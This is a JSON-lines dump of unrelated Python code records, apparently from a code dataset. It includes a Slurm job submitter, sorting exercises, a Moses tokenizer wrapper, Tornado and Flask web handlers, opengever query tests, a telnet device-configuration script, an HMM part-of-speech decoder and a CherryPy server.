python3\n'''\nsubmit slurm jobs from snakemake, cp slurm cluster config into bash scripts\n\nCreated on 2019-03-25\n\n@author: Meghan Correa \n@copyright: 2019 The Presidents and Fellows of Harvard College. 
All rights reserved.\n@license: GPL v2.0\n'''\n\nimport os\nimport sys\nimport shutil\nfrom collections import OrderedDict\n\nfrom snakemake.utils import read_job_properties\n\njobscript = sys.argv[1]\njob_props = read_job_properties(jobscript)\n\n# uncomment out to write jobscript to script folder\n#shutil.copyfile(jobscript, (job_props['input'][0] + '_jobscript'))\n\n# the input file is a bash script to submit to slurm, read cmd in\nwith open(job_props['input'][0], 'r') as fh:\n cmd = fh.readlines()\n\nprefix = []\ncli_opts = []\n# get slurm opts as a prefix for cmd\nfor prop, val in job_props['cluster'].items():\n sbatch_val = ''\n if val != '':\n sbatch_val = '=%s' % val\n prefix.append('#SBATCH --%s%s\\n' % (prop, sbatch_val))\n cli_opts.append('--%s%s' % (prop, sbatch_val))\n\n# write new prefixed cmd to the file\nnew_cmd = [cmd[0]] + prefix + cmd[1:]\nwith open(job_props['input'][0], 'w') as fh:\n for l in new_cmd:\n fh.write(l)\n\n\ncli_opt_str = ' '.join(cli_opts)\n\nos.system(\"sbatch {cli_opts} {script}\".format(cli_opts=cli_opt_str, script=jobscript))\n","sub_path":"odybcl2fastq/profiles/rc_slurm/slurm_submit.py","file_name":"slurm_submit.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"392985768","text":"# arr=[8, 5, 3, 7, 9, 3, 4, 12, 2, 6]\n#\n# step = 4\n# for(i = 0, i < n; i = i+step;\n# insertionSort(arr,i,min(i+step,n-1)\n#\n#\n# insertionSort(arr, l,h)\n#\n\n# [8, 5, 3, 7, 9\n#\ndef swap(arr, a, b):\n t = arr[a]\n arr[a] = arr[b]\n arr[b] = t\n\n\ndef insertion_sort(arr, low, high):\n for i in range(low + 1, high + 1):\n\n run = i\n while run - 1 >= low and arr[run] < arr[run - 1]:\n swap(arr, run, run - 1)\n run -= 1\n\n\ndef merge(arr, start1, start2):\n t = start1\n seg = start2 - start1\n end1 = start2 - 1\n end2 = min(start2 + seg - 1, len(arr) - 1)\n\n res = []\n i = 0\n while start1 <= end1 or start2 <= end2:\n\n if start1 <= end1 and start2 <= end2:\n if arr[start1] <= arr[start2]:\n\n res.append(arr[start1])\n i += 1\n start1 += 1\n else:\n res.append(arr[start2])\n i += 1\n start2 += 1\n elif start1 <= end1:\n res.append(arr[start1])\n i += 1\n start1 += 1\n else:\n res.append(arr[start2])\n i += 1\n start2 += 1\n\n for i in range(len(res)):\n arr[t] = res[i]\n t += 1\n\n\nRUN = 3\n\n\ndef tim_sort(arr):\n n = len(arr)\n i = 0\n while i < n:\n h = min(i + RUN - 1, n - 1)\n insertion_sort(arr, i, h)\n i = i + RUN\n\n size = RUN\n while size < n:\n\n left = 0;\n while left < n:\n # right = min(left + size - 1, n - 1)\n mid = left + size\n merge(arr, left, mid)\n left += 2 * size\n\n size = size * 2\n\n\narr = [8, 5, 3, 7, 9, 3, 4, 12, 6, 2]\ntim_sort(arr)\nprint(str(arr))\n","sub_path":"src/algos/sorting/quick_sort/tim_sort.py","file_name":"tim_sort.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477355336","text":"\"\"\"Do moses tok detok.\"\"\"\n# pylint: disable=invalid-name, unused-import\n\nimport sys\n\ntry:\n import sacremoses # noqa: F401\nexcept ModuleNotFoundError:\n import subprocess as sp\n import shlex\n proc = sp.Popen(\n shlex.split('pip install sacremoses'), stdout=-1, stderr=-1)\n out, err = proc.communicate()\n if err:\n sys.stderr.write('error: %s' % err.decode())\n sys.stdout.write('%s' % out.decode())\n\nfrom sacremoses import MosesTokenizer, MosesDetokenizer\n\nMTOK = MosesTokenizer().tokenize\nMDETOK = MosesDetokenizer().detokenize\nmtok = 
MTOK\nmdetok = MDETOK\n","sub_path":"freemt_utils/mtok.py","file_name":"mtok.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417197640","text":"#!/usr/bin/env python\n\nimport tornado.ioloop\nimport tornado.web\nfrom tornado.escape import json_decode, url_unescape\nfrom form import FormHandler, allquestions\nfrom tornadoadfsoauth2.auth import AuthHandler\nfrom tornadoadfsoauth2.session import sessions\nimport sys, json\nfrom base import BaseHandler\nimport templates\nfrom db import db\nimport aux\nimport logging\n\nclass EntriesHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self, company, path, args):\n company = url_unescape(company)\n project = self.get_query_argument('project', None)\n asjson = True if self.get_query_argument('format', None) == 'json' else False\n modify = True if self.get_query_argument('modify', None) == 'true' else False\n domain = self.get_query_argument('domain', None)\n if self.is_user_admin():\n modify = True\n # no args - list projects\n if not project and not asjson:\n self.write(templates.start)\n self.render_header()\n if not domain:\n self.write(\"
<h2>Business units</h2>\\n\")\n                self.write('<ul>\\n')\n                for x in db.list_domains(path, company):\n                    self.write('<li><a href=\"/%s/%s?domain=%s\">%s</a></li>\\n'%(company,path,x,x))\n                self.write('</ul>\\n')\n                self.write(\"<h2>Projects</h2>\\n\")\n            else:\n                self.write(\"<h2>Projects for %s</h2>\\n\"%domain)\n            for x in db.list_projects(path, company, domain):\n                self.write('<li><a href=\"?project=%s\">%s (%s)</a></li>\\n'%(x[0],x[0], x[1]))\n            self.write('<p><a href=\"?format=json\">Raw data</a>\\n')\n            statspath = '/%s/'%company + path.split('/')[0] + '/stats/'\n            self.write('-- <a href=\"%s\">Statistics</a>\\n' % (statspath))\n            planningpath = '/' + path.split('/')[0] + '/planning/'\n            self.write('-- <a href=\"%s\">Planning</a>\\n' % (planningpath))\n            self.write(templates.end)\n        elif asjson:\n            if project: # all scores for a project\n                self.write({'scores':db.entries_by_project(path, company, project),\n                            'questions': allquestions(path)})\n            else: # latest scores for each project\n                d = []\n                for p in db.list_projects(path, company):\n                    d.append(db.entries_by_project(path, company, p[0])) # db orders by date desc\n                self.write({'latest_scores':d, 'questions': allquestions(path)})\n        else:\n            self.write(templates.start)\n            self.render_header()\n            r = ''\n            r += '<h2>Entries for project %s</h2>\\n'%project\n            r += '<table>\\n<tr>\\n'\n            columns = ['Date','Answered', 'Risk level', 'Score', 'Submitted by']\n            if modify:\n                columns = ['Date','Answered','Risk level','Score', 'Submitted by' ,'', '']\n            # kludge to only show risk level for ssa\n            if not path in ['ssa', 'satsi'] and 'Risk level' in columns:\n                columns.remove('Risk level')\n            for x in columns:\n                r += '<th>%s</th>\\n'%x\n            r += '</tr>\\n'\n            for e in db.entries_by_project(path, company, project):\n                r += '<tr>\\n'\n                r += '<td><a href=\"/%s/%s?project=%s\">%s</a></td>\\n'%(company, path, e['id'], aux.unixtime2date(e['date']))\n                r += '<td>%d / %d</td>\\n'%(e['score']['answer_count'], e['score']['answer_count'] + e['score']['unanswered'])\n                if 'Risk level' in columns:\n                    try:\n                        r += '<td>%s</td>\\n'%(e['score']['risk_level'])\n                    except:\n                        r += '<td>n/a</td>\\n'\n                        logging.debug(str(e['score']))\n                        logging.debug(json.dumps(e['score'], indent=4))\n                r += '<td>%s</td>\\n'%(e['score']['score'])\n                r += '<td>%s</td>\\n'%(e['submitter'])\n                if modify:\n                    r += '<td><a href=\"/%s/%s/form?id=%s\">Modify</a></td>\\n'%(company, path, e['id'])\n                    r += '<td><a href=\"/%s/%s/delete?id=%s\">Delete</a></td>\\n'%(company, path, e['id'])\n                r += '</tr>\\n'\n            r += '</table>\\n<p><a href=\"?project=%s&format=json\">Raw data</a>\\n'%(project)\n            self.write(r)\n            self.write(templates.end)\n    \n","sub_path":"web/entries.py","file_name":"entries.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"47320165","text":"# Quick sort\n# This is a divide and conquer algorithm\n# Quick sort first divides a large array into two smaller sub-arrays: the low elements and the high elements.\n# Quick sort can then recursively sort the sub-arrays.\n# O(n^2) for worst case, O(n log n) average\n\n\ndef quick_sort(sequence):\n    if len(sequence) <= 1:\n        return sequence\n    lo, pi, hi = partition(sequence)\n    return quick_sort(lo) + [pi] + quick_sort(hi)\n\n\ndef partition(sequence):\n    pi, sequence = sequence[0], sequence[1:]\n    lo = [x for x in sequence if x <= pi]\n    hi = [x for x in sequence if x > pi]\n    return lo, pi, hi
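\n\n# Added sketch (not in the original file): a quick demonstration on a small list\n# with duplicates; partition picks the first element as the pivot.\nif __name__ == '__main__':\n    print(quick_sort([8, 3, 5, 3, 9, 1]))  # -> [1, 3, 3, 5, 8, 9]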
\n","sub_path":"sorting/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"4192486","text":"from ftw.builder import Builder\nfrom ftw.builder import create\nfrom opengever.base.oguid import Oguid\nfrom opengever.globalindex.model.task import Task\nfrom opengever.ogds.base.utils import get_current_admin_unit\nfrom opengever.testing import IntegrationTestCase\nfrom opengever.testing import obj2brain\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom zope.app.intid.interfaces import IIntIds\nfrom zope.component import getUtility\n\n\nclass TestTaskQueries(IntegrationTestCase):\n\n    def test_in_pending_state_returns_only_pending_tasks(self):\n        self.login(self.regular_user)\n\n        pending_tasks = Task.query.in_pending_state().all()\n\n        self.assertIn(self.task.get_sql_object(), pending_tasks)\n        self.assertIn(self.subtask.get_sql_object(), pending_tasks)\n        self.assertIn(self.task.get_sql_object(), pending_tasks)\n\n        self.assertNotIn(self.seq_subtask_2.get_sql_object(), pending_tasks)\n\n    def test_users_tasks_lists_only_tasks_assigned_to_current_user(self):\n        self.login(self.regular_user)\n\n        self.assertItemsEqual(\n            [self.meeting_task.get_sql_object(),\n             self.meeting_subtask.get_sql_object()],\n            Task.query.users_tasks(self.dossier_responsible.id).all())\n\n    def test_issued_task_lists_only_task_issued_by_the_current_user(self):\n        self.login(self.regular_user)\n\n        self.assertItemsEqual(\n            [self.sequential_task.get_sql_object()],\n            Task.query.users_issued_tasks(self.regular_user.id).all())\n\n        self.assertItemsEqual(\n            [self.seq_subtask_1.get_sql_object(),\n             self.seq_subtask_2.get_sql_object()],\n            Task.query.users_issued_tasks(self.secretariat_user.id).all())\n\n    def test_by_intid_with_existing_pair(self):\n        self.login(self.regular_user)\n\n        intid = getUtility(IIntIds).getId(self.task)\n        self.assertEquals(self.task.get_sql_object(),\n                          Task.query.by_intid(intid, 'plone'))\n\n    def test_by_intid_with_NOT_existing_pair_returns_none(self):\n        self.login(self.regular_user)\n        self.assertIsNone(None, Task.query.by_intid(1, 'bd'))\n\n    def test_task_by_oguid_returns_correct_task_with_oguid_instance_param(self):\n        self.login(self.regular_user)\n\n        oguid = Oguid.for_object(self.task)\n        self.assertEqual(self.task.get_sql_object(), Task.query.by_oguid(oguid))\n\n    def test_task_by_oguid_returns_correct_task_with_string_param(self):\n        self.login(self.regular_user)\n\n        oguid = Oguid.for_object(self.task)\n        self.assertEqual(self.task.get_sql_object(), Task.query.by_oguid(oguid.id))\n\n    def test_task_by_oguid_returns_non_for_unknown_oguids(self):\n        self.login(self.regular_user)\n\n        self.assertIsNone(Task.query.by_oguid('theanswer:42'))\n\n    def test_py_path(self):\n        self.login(self.regular_user)\n\n        self.assertEquals(self.task.get_sql_object(),\n                          Task.query.by_path(self.task.get_physical_path(), 'plone'))\n\n    def test_py_path_returns_none_for_not_existing_task(self):\n        self.login(self.regular_user)\n\n        self.assertEquals(None, Task.query.by_path('test/not-existng/', 'plone'))\n\n    def test_by_ids_returns_tasks_wich_match_the_given_id(self):\n        self.login(self.regular_user)\n\n        tasks = [self.task, self.subtask, self.meeting_subtask]\n\n        self.assertEquals(\n            [task.get_sql_object() for task in tasks],\n            Task.query.by_ids([task.get_sql_object().id for task in tasks]))\n\n    def test_by_assigned_org_unit(self):\n        self.login(self.regular_user)\n\n        additional = self.add_additional_org_unit()\n\n        self.task.get_sql_object().assigned_org_unit = additional.id()\n        self.meeting_subtask.get_sql_object().assigned_org_unit = additional.id()\n\n        self.assertItemsEqual(\n            [self.task.get_sql_object(), self.meeting_subtask.get_sql_object()],\n            Task.query.by_assigned_org_unit(additional).all())\n\n    def test_by_issuing_org_unit(self):\n        self.login(self.regular_user)\n\n        additional = self.add_additional_org_unit()\n\n        self.task.get_sql_object().issuing_org_unit = additional.id()\n        self.meeting_subtask.get_sql_object().issuing_org_unit = additional.id()\n\n        self.assertEquals(\n            [self.task.get_sql_object(), self.meeting_subtask.get_sql_object()],\n            Task.query.by_issuing_org_unit(additional).all())\n\n    def test_all_issued_tasks_lists_all_tasks_created_on_given_admin_unit(self):\n        self.login(self.regular_user)\n\n        additional = create(Builder('admin_unit').id(\"additional\"))\n\n        tasks = [self.task.get_sql_object(),\n                 self.meeting_subtask.get_sql_object()]\n\n        self.task.get_sql_object().admin_unit_id = additional.id()\n        self.meeting_subtask.get_sql_object().admin_unit_id = additional.id()\n\n        self.assertItemsEqual(\n            tasks, Task.query.all_issued_tasks(additional).all())\n\n    def test_restrict_checks_principals(self):\n        # Responsible user is able to see\n        self.login(self.regular_user)\n        sql_task = self.task_in_protected_dossier.get_sql_object()\n        self.assertIn(sql_task, Task.query.restrict().all())\n\n        # Secretariat user is not able to see the task\n        self.login(self.secretariat_user)\n        self.assertNotIn(sql_task, Task.query.restrict().all())\n\n    def test_restrict_checks_is_skipped_for_admins(self):\n        # Responsible user is able to see\n        self.login(self.administrator)\n        sql_task = self.task_in_protected_dossier.get_sql_object()\n        self.assertIn(sql_task, Task.query.restrict().all())\n\n    def 
test_by_container_list_recursive_all_tasks_inside_the_given_container(self):\n self.login(self.regular_user)\n\n self.assertItemsEqual(\n [self.task.get_sql_object(),\n self.subtask.get_sql_object(),\n self.sequential_task.get_sql_object(),\n self.seq_subtask_1.get_sql_object(),\n self.seq_subtask_2.get_sql_object(),\n self.seq_subtask_3.get_sql_object(),\n self.info_task.get_sql_object(),\n self.private_task.get_sql_object(),\n self.inbox_task.get_sql_object()],\n Task.query.by_container(self.dossier, get_current_admin_unit()).all())\n\n def test_by_container_handles_similar_paths_exactly(self):\n self.login(self.regular_user)\n\n # manually set a similar physical path than self.task\n self.sequential_task.get_sql_object().physical_path = (\n 'ordnungssystem/fuhrung/vertrage-und-vereinbarungen/dossier-11'\n '/task-3'\n ) # Do not add commas within this grouping - this is a string!\n\n tasks = Task.query.by_container(self.dossier, get_current_admin_unit()).all()\n\n self.assertIn(self.task.get_sql_object(), tasks)\n self.assertNotIn(self.sequential_task.get_sql_object(), tasks)\n\n def test_by_container_queries_adminunit_dependent(self):\n self.login(self.regular_user)\n\n additional = create(Builder('admin_unit').id(\"additional\"))\n self.assertItemsEqual(\n [],\n Task.query.by_container(self.dossier, additional).all())\n\n def test_by_brain_returns_corresponding_sql_task(self):\n self.login(self.regular_user)\n\n self.assertEquals(\n self.task.get_sql_object(),\n Task.query.by_brain(obj2brain(self.task)))\n\n def test_by_brain_queries_adminunit_dependent(self):\n self.login(self.regular_user)\n\n self.assertEquals(\n self.task.get_sql_object(),\n Task.query.by_brain(obj2brain(self.task)))\n\n # manually change admin_unit of task\n self.task.get_sql_object().admin_unit_id = 'additional'\n\n with self.assertRaises(NoResultFound):\n self.assertIsNone(Task.query.by_brain(obj2brain(self.task)))\n\n def test_subtasks_by_task_returns_all_subtask_excluding_the_given_one(self):\n self.login(self.regular_user)\n\n self.assertEqual(\n [self.seq_subtask_1.get_sql_object(),\n self.seq_subtask_2.get_sql_object(),\n self.seq_subtask_3.get_sql_object()],\n Task.query.subtasks_by_task(self.sequential_task.get_sql_object()).all())\n\n def test_subtasks_by_task_returns_empty_list_when_no_subtask_exists(self):\n self.login(self.regular_user)\n\n self.assertEqual(\n [],\n Task.query.subtasks_by_task(self.expired_task.get_sql_object()).all())\n","sub_path":"opengever/globalindex/tests/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"551633570","text":"#!/usr/bin/env python\n#\n\nimport telnetlib\nimport time\nimport os\nterminator = \"\\n\"\nf = file(\"/home/remos/REMOS/desk/disintroy.txt\",\"a\")\n\nf.write(\"Begin operations.\"+terminator)\n\ntn = telnetlib.Telnet('remmoxa')\n\not=tn.read_until(\"selection:\", 4)\nf.write(\"-1-\"+ot+terminator)\ntn.write(\"v\" + terminator)\n#tn.write(\"3\" + terminator)\not=tn.read_until(\"selection:\", 4)\nf.write(\"-1b-\"+ot+terminator)\ntn.write(\"q\" + terminator)\n\ntstr = time.gmtime()\nf.write(str(tstr)+terminator)\n\nif (0) :\n ot=tn.read_until(\"selection:\", 4)\n f.write(\"-2-\"+ot+terminator)\n tn.write(\"4\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(\"-3-\"+ot+terminator)\n tn.write(\"2\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(ot+terminator)\n tn.write(\"a\" + terminator)\n 
ot=tn.read_until(\"selection:\", 4)\n f.write(ot+terminator)\n tn.write(\"q\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(ot+terminator)\n tn.write(\"q\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(ot+terminator)\n tn.write(\"s\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(ot+terminator)\n tn.write(\"y\" + terminator)\n\n#time.sleep(45)\n\not = 'fine'\n#ot = tn.read_all()\nf.write(\"ALL:\"+ot+terminator)\n\ntn.close()\n\nf.write(\"End operations.\"+terminator)\n\nf.close()\n#\n\n","sub_path":"REMOS/desk/moxaBaud.py","file_name":"moxaBaud.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"215899474","text":"import time\nstart_time = time.time()\nimport json, sys\npathRead = 'hmmmodel.txt'\nParameters = [json.loads(x) for x in open(pathRead, mode = 'r', encoding = 'UTF-8').read().split('\\n')]\ntagCount = Parameters[0]\nwordGivenTag = Parameters[1]\ntagGivenTag = Parameters[2]\n\ndef ViterbiAlgo(tagCount, wordGivenTag, tagGivenTag):\n pathTest = sys.argv[1]\n f = open(pathTest, encoding = 'UTF-8')\n allSentencesTest = f.read()\n sentencesListTest = allSentencesTest.splitlines()\n taggedSents = []\n for sentence in sentencesListTest:\n wordList = sentence.split()\n firstWord = wordList[0]\n Viterbi = []#Viterbi is a 3D Dictionary containing word as the state, all tags for each state\n#Calculate Viterbi for first word\n Viterbi.append({})\n States ={}\n if firstWord in wordGivenTag.keys():\n States = wordGivenTag[firstWord]\n else:\n States = tagCount\n for tag in States.keys():\n if tag == '_START_':\n continue\n if firstWord in wordGivenTag.keys():\n emissionProb = wordGivenTag[firstWord][tag]\n else:\n emissionProb = 1\n Viterbi[0][tag]={}\n Viterbi[0][tag]['probability'] = tagGivenTag['_START_'][tag] * emissionProb \n Viterbi[0][tag]['backpointer'] = '_START_'\n \n #Start from word 1\n for i in range(1,len(wordList)):\n word = wordList[i]\n Viterbi.append({})\n if word in wordGivenTag.keys():\n States = wordGivenTag[word]\n else:\n States = tagCount\n for currTag in States.keys():\n if currTag == '_START_' or currTag == '_END_':\n continue\n if word in wordGivenTag.keys():\n emissionProb = wordGivenTag[word][currTag]\n else:\n emissionProb = 1\n maxProb ={'prob':0,'backpointer':''}\n #print(\"Previous Keys \", Viterbi[i-1].keys())#['probability'])\n #print(\"len of Viterbi\", len(Viterbi[i-1]))\n for prevTag in Viterbi[i-1].keys():#CHeck This\n if prevTag == '_START_' or prevTag == '_END_':\n continue\n tempProb = Viterbi[i-1][prevTag]['probability'] * \\\n tagGivenTag[prevTag][currTag] * \\\n emissionProb\n if(tempProb>maxProb['prob']):\n maxProb['prob'] = tempProb\n maxProb['backpointer'] = prevTag#Viterbi[i-1][prevTag]['backpointer']\n\n Viterbi[i][currTag] = {}\n Viterbi[i][currTag]['probability'] = maxProb['prob']\n Viterbi[i][currTag]['backpointer'] = maxProb['backpointer']\n \n #print(\"currTag given to\", i, \" is\", Viterbi[i][currTag])\n #print(c,\"\\n\")\n #Do for End\n States = Viterbi[-1].keys()\n n = len(wordList)\n Viterbi.append({})\n maxProb ={'prob':0,'backpointer':''}\n for tag in States:\n if tag == '_END_':\n continue\n tempProb = Viterbi[n-1][tag]['probability'] * \\\n tagGivenTag[tag]['_END_'] \n if(tempProb>maxProb['prob']):\n maxProb['prob'] = tempProb\n maxProb['backpointer'] = tag\n Viterbi[-1]['_END_']={}\n Viterbi[-1]['_END_']['probability'] = maxProb['prob']\n Viterbi[-1]['_END_']['backpointer'] = 
maxProb['backpointer'] \n        taggedSents.append(tagSentence(Viterbi, wordList))\n\n    print(len(taggedSents))\n    writeFile(taggedSents)\n\ndef tagSentence(Viterbi, wordList):\n    state = len(wordList)\n    #print(Viterbi[state]['_END_'])\n    tag = '_END_'\n    iList = \"\"\n    i = len(wordList)-1\n    while i >= 0:\n        #print(Viterbi[state][tag])\n        iList = wordList[i]+\"/\"+Viterbi[state][tag]['backpointer']+\" \" + iList\n        tag = Viterbi[state][tag]['backpointer']\n        state -= 1\n        i-=1\n    return iList\n    \ndef writeFile(taggedSents):\n    writeFilePath = 'hmmoutput.txt'\n    writeFile = open(writeFilePath, mode = 'w', encoding = 'UTF-8')\n    for sentence in taggedSents:\n        writeFile.write(sentence)\n        writeFile.write(\"\\n\")\n    \nViterbiAlgo(tagCount, wordGivenTag, tagGivenTag)\n","sub_path":"Generalised Parts Of Speech Tagger/hmmdecode3.py","file_name":"hmmdecode3.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"512301378","text":"\"\"\"\nOnce you know how to read and write text files, reading and writing binary files is just as simple; the code below copies an image file.\n\"\"\"\n\n\ndef main():\n    try:\n        # read binary - rb\n        with open('a.jpg', 'rb') as fs1:\n            data = fs1.read()\n            print(type(data))  # <class 'bytes'>\n        # write binary - wb\n        with open('b.jpg', 'wb') as fs2:\n            # write the image's binary data into b.jpg through fs2\n            fs2.write(data)\n    except FileNotFoundError as e:\n        print('The specified file could not be opened.')\n    except IOError as e:\n        print('An error occurred while reading or writing the file.')\n    print('Program execution finished.')\n\n\nif __name__ == '__main__':\n    main()","sub_path":"cn/study/days100/days011/05读写二进制文件.py","file_name":"05读写二进制文件.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"154274300","text":"import os\nfrom flask import Flask, session, render_template, request, flash, redirect, url_for, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'hard to guess secure key'\n\n# INITIALIZE SQLAlchemy\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\ndb = SQLAlchemy(app)\n\n# DEFINITION OF ACTOR TABLE\nclass Actor(db.Model):\n    __tablename__ = 'actors'\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(64))\n    about = db.Column(db.Text)\n    # one-to-many relationship\n    movies = db.relationship('Movie', backref='actor', cascade=\"delete\")\n\n# DEFINITION OF MOVIE TABLE\nclass Movie(db.Model):\n    __tablename__ = 'movies'\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(256))\n    year = db.Column(db.Integer)\n    actor_id = db.Column(db.Integer, db.ForeignKey('actors.id'))\n\n# HOMEPAGE ROUTE\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n# ACTOR TABLE ROUTE\n@app.route('/actors')\ndef show_all_actors():\n    actors = Actor.query.all()\n    return render_template('actors-all.html', actors=actors)\n\n# ADD ACTOR FORM ROUTE\n@app.route('/actors/add/', methods=['GET', 'POST'])\ndef add_actors():\n    if request.method == 'GET':\n        return render_template('actors-add.html')\n    if request.method == 'POST':\n        name = request.form['name']\n        about = request.form['about']\n        actor = Actor(name=name, about=about)\n        db.session.add(actor)\n        db.session.commit()\n        return redirect(url_for('show_all_actors'))\n\n# ADD ACTOR BUTTON ROUTE\n@app.route('/api/actors/add', methods=['POST'])\ndef add_ajax_actors():\n    name = request.form['name']\n    about = request.form['about']\n    actor = Actor(name=name, about=about)\n    
db.session.add(actor)\n    db.session.commit()\n    flash('Actor Inserted', 'success')\n    return jsonify({\"id\": str(actor.id), \"name\": actor.name})\n\n# EDIT ACTOR ROUTE\n@app.route('/actors/edit/<int:id>', methods=['GET', 'POST'])\ndef edit_actor(id):\n    actor = Actor.query.filter_by(id=id).first()\n    if request.method == 'GET':\n        return render_template('actors-edit.html', actor=actor)\n    if request.method == 'POST':\n        actor.name = request.form['name']\n        actor.about = request.form['about']\n        db.session.commit()\n        return redirect(url_for('show_all_actors'))\n\n# DELETE ACTOR ROUTE\n@app.route('/actors/delete/<int:id>', methods=['GET', 'POST'])\ndef delete_actor(id):\n    actor = Actor.query.filter_by(id=id).first()\n    if request.method == 'GET':\n        return render_template('actors-delete.html', actor=actor)\n    if request.method == 'POST':\n        db.session.delete(actor)\n        db.session.commit()\n        return redirect(url_for('show_all_actors'))\n\n# DELETE AJAX ROUTE\n@app.route('/api/actors/<int:id>', methods=['DELETE'])\ndef delete_ajax_actor(id):\n    actor = Actor.query.get_or_404(id)\n    db.session.delete(actor)\n    db.session.commit()\n    return jsonify({\"id\": str(actor.id), \"name\": actor.name})\n\n# MOVIE TABLE ROUTE\n@app.route('/movies')\ndef show_all_movies():\n    movies = Movie.query.all()\n    return render_template('movie-all.html', movies=movies)\n\n# ADD MOVIE FORM ROUTE\n@app.route('/movie/add', methods=['GET', 'POST'])\ndef add_movies():\n    if request.method == 'GET':\n        actors = Actor.query.all()\n        return render_template('movie-add.html', actors=actors)\n    if request.method == 'POST':\n        name = request.form['name']\n        year = request.form['year']\n        actor_name = request.form['actor']\n        actor = Actor.query.filter_by(name=actor_name).first()\n        movie = Movie(name=name, year=year, actor=actor)\n        db.session.add(movie)\n        db.session.commit()\n        return redirect(url_for('show_all_movies'))\n\n# EDIT MOVIE ROUTE\n@app.route('/movie/edit/<int:id>', methods=['GET', 'POST'])\ndef edit_movie(id):\n    movie = Movie.query.filter_by(id=id).first()\n    actors = Actor.query.all()\n    if request.method == 'GET':\n        return render_template('movie-edit.html', movie=movie, actors=actors)\n    if request.method == 'POST':\n        movie.name = request.form['name']\n        movie.year = request.form['year']\n        actor_name = request.form['actor']\n        actor = Actor.query.filter_by(name=actor_name).first()\n        movie.actor = actor\n        db.session.commit()\n        return redirect(url_for('show_all_movies'))\n\n# DELETE MOVIE ROUTE\n@app.route('/movie/delete/<int:id>', methods=['GET', 'POST'])\ndef delete_movie(id):\n    movie = Movie.query.filter_by(id=id).first()\n    actors = Actor.query.all()\n    if request.method == 'GET':\n        return render_template('movie-delete.html', movie=movie, actors=actors)\n    if request.method == 'POST':\n        db.session.delete(movie)\n        db.session.commit()\n        return redirect(url_for('show_all_movies'))\n\n# DELETE MOVIE AJAX ROUTE\n@app.route('/api/movie/<int:id>', methods=['DELETE'])\ndef delete_ajax_movie(id):\n    movie = Movie.query.get_or_404(id)\n    db.session.delete(movie)\n    db.session.commit()\n    return jsonify({\"id\": str(movie.id), \"name\": movie.name})\n\n# ABOUT ME ROUTE\n@app.route('/about')\ndef about():\n    return render_template('about.html')\n\n# RUN PROGRAM\nif __name__ == '__main__':\n    app.run()\n","sub_path":"misy350-final/finalproject/moviebase.py","file_name":"moviebase.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"288754150","text":"#coding=utf-8 \nfrom __future__ import division\nimport os, 
os.path\nimport cherrypy\nimport string\nimport json\n\nimport searchServer\nimport exploreServer\nimport LDAServer\n\nclass Papernet_index(object):\n @cherrypy.expose\n def index(self):\n return open('index.html')\n def dashboard(self):\n return open('dashboard.html')\n def explore(self):\n return open('explore.html')\n def LDA(self):\n return open('LDA.html')\n\n\n\nif __name__ == '__main__':\n conf = {\n '/': {\n 'tools.sessions.on': True,\n 'tools.staticdir.root': os.path.abspath(os.getcwd())\n },\n \n '/dashboard': {\n 'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type', 'text/plain')],\n },\n\n '/explore': {\n 'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type', 'text/plain')],\n }, \n\n '/LDA': {\n 'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type', 'text/plain')],\n }, \n \n '/static': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.dir': './'\n }\n }\n\n webapp = Papernet_index()\n webapp.dashboard = searchServer.Papernet_dashboardService()\n webapp.explore = exploreServer.Papernet_exploreService()\n webapp.LDA = LDAServer.Papernet_LDAService()\n cherrypy.server.socket_host= \"0.0.0.0\"\n cherrypy.quickstart(webapp, '/', conf)\n\n\n\n\n","sub_path":"papernetServer.py","file_name":"papernetServer.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"206966036","text":"#This program is a class that I will work on to get better with\n#working with 